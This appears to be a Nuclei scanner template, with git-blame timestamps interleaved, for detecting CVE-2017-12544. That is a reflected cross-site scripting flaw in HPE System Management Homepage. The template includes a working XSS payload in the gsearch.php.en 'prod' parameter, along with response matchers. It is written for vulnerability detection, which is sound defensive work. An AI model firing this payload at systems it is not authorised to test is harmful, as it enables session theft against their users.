2022-08-16 14:14:41 +00:00
id : CVE-2017-12544
2022-04-22 10:38:41 +00:00
2022-05-17 09:18:12 +00:00
info :
2022-08-16 14:14:41 +00:00
name : HPE System Management - Cross-Site Scripting
2022-05-17 09:18:12 +00:00
author : divya_mudgal
severity : medium
2022-08-16 14:14:41 +00:00
description : HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software.
2022-05-17 09:18:12 +00:00
reference :
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-12544
2023-07-11 19:49:27 +00:00
- http://www.securitytracker.com/id/1039437
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-05-17 09:18:12 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2017-12544
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.96723
2024-05-31 19:23:20 +00:00
epss-percentile : 0.99656
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : hp
product : system_management_homepage
tags : cve,cve2017,xss,hp
2022-04-22 10:38:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-16 14:14:41 +00:00
- method : GET
path :
- "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2022-08-16 14:14:41 +00:00
words :
- "var prodName = '';prompt`document.domain`;//';"
- type : word
2023-07-11 19:49:27 +00:00
part : header
2022-08-16 14:14:41 +00:00
words :
- "text/html"
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100c664906de3dbfed265f2b22def98c3be8115a90a6329d475abc146aed54b40590220232f4a4d20c1a0eabfee1bb1cf5bd6b769acee1a64e4ad2df72e4d026bb578ee:922c64590222798bb761d5b6d8e72950